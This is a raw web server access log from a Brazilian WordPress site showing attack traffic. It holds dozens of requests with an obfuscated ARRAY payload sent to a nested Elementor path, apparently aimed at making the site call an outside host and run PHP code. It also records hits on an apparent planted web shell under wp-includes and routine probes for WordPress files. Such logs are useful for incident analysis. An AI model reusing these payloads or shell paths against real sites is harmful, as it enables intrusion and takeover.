179.188.53.243 - - [16/Mar/2026:00:59:33 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373137332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333537332q6664616365383363393862376566623561616166313133356539333461353662222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:00:59:54 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373139342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333539342q3763633132383763646437633862393635393639666565633939303735323431222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:00:15 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373231352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333631352q6337333439316432616162323234306630626335623065616535643230656131222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:00:36 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373233362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333633362q3963663965323538383032303039643763623763343965633538393766643966222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:00:57 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373235372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333635372q3431633439626464326437386134353030616434303566393036333939663862222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
204.12.208.18 - - [16/Mar/2026:01:05:51 -0300] "GET /wp-includes/imddc187/edit.php HTTP/1.1" 200 6 "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
179.188.53.243 - - [16/Mar/2026:01:01:19 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373237392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333637392q3634313638626465363638373135383361653237343132643239383532613434222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:01:40 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373330302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333730302q6363343538636637326238333264633533336661323339366638343262636631222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
204.12.208.18 - - [16/Mar/2026:01:05:32 -0300] "GET /wp-includes/imddc187/edit.php HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
179.188.53.243 - - [16/Mar/2026:01:02:02 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373332322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333732322q6333386262663763363436393135653561376138363464326130353634393635222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:02:23 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373334332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333734332q3466366138333561376236383835363162653738646336383833623862626365222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:02:44 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373336342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333736342q3633356334303239643264336336623239323962646632306164383065633963222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:03:05 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373338352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333738352q6135666666653931333161316231316239386238623333313163656132656366222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:03:26 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373430362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333830362q6530383232326230393162643161636431643931383234326564333761646161222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:01:07:04 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:01:03:47 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373432372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333832372q3431613833326336666233333961386237343134343838666635346263343232222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [16/Mar/2026:01:08:47 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.228.16 - - [16/Mar/2026:01:09:06 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [16/Mar/2026:01:04:09 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373434392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333834392q3033353937323162353937336638316561323037663632663938353162333366222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
205.185.117.70 205.185.117.70 - - [16/Mar/2026:01:09:14 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:01:04:30 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373437302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333837302q3638613636616130316533616462373636393864386438353062323164636661222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:04:51 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373439312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333839312q3536646364363531663732663463343730333665356536393739626235353661222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:01:08:37 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:01:05:12 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373531322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333931322q3564643637336534666465376439653137346332633861396662373038363962222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
205.185.123.125 205.185.123.125 - - [16/Mar/2026:01:10:24 -0300] "GET /wp-login.php HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
179.188.53.243 - - [16/Mar/2026:01:05:33 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373533332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333933332q3434386336613065343965336537393932303833643163363232383065326334222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:10:55 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:01:05:57 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373535372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333935372q3838663937613438643961363430626438303762623564393939396233653464222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:10:59 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:01 -0300] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:09 -0300] "GET /xmlrpc.php?rsd HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:10 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:11 -0300] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:13 -0300] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:14 -0300] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:17 -0300] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:18 -0300] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
5.35.38.15 - - [16/Mar/2026:01:11:18 -0300] "GET /wp-login.php HTTP/1.1" 404 16 "https://bandeirantesbombas.com.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
5.35.38.15 - - [16/Mar/2026:01:11:20 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
179.188.53.243 - - [16/Mar/2026:01:06:21 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373538312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633333938312q6235313662343334313538373232653032626639623538333631383062303535222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:20 -0300] "GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:01:06:43 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373630332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343030332q6361386630333839316663636661323662373938366633386138343439653330222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:22 -0300] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
69.197.179.242 - - [16/Mar/2026:01:10:26 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:44 -0300] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:57 -0300] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:01:07:05 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373632352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343032352q6238666237323137623661386535333038356432323065386531316635396264222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:11:58 -0300] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:01:07:26 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373634362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343034362q6661323261653938626335306536653032363164333834396632323962356635222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:12:06 -0300] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:12:27 -0300] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:01:07:47 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373636372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343036372q3066383837376165326330353933323461613664396232663564386261646530222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:12:29 -0300] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.38.45.165 13.38.45.165 - - [16/Mar/2026:01:12:48 -0300] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 200 74379 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:01:08:08 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373638382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343038382q6665396563623566323736366164363161386436633535306632306465383931222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:01:11:57 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:01:08:31 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373731312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343131312q3530303738663266623534656161366637336338356234393037663130363666222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:08:52 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373733322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343133322q3062383565313733316333363539316237383437303464626661386137366235222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [16/Mar/2026:01:14:09 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [16/Mar/2026:01:09:13 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373735332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343135332q6631323762613138356333343762663764303166313065633665636365613364222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [16/Mar/2026:01:14:28 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
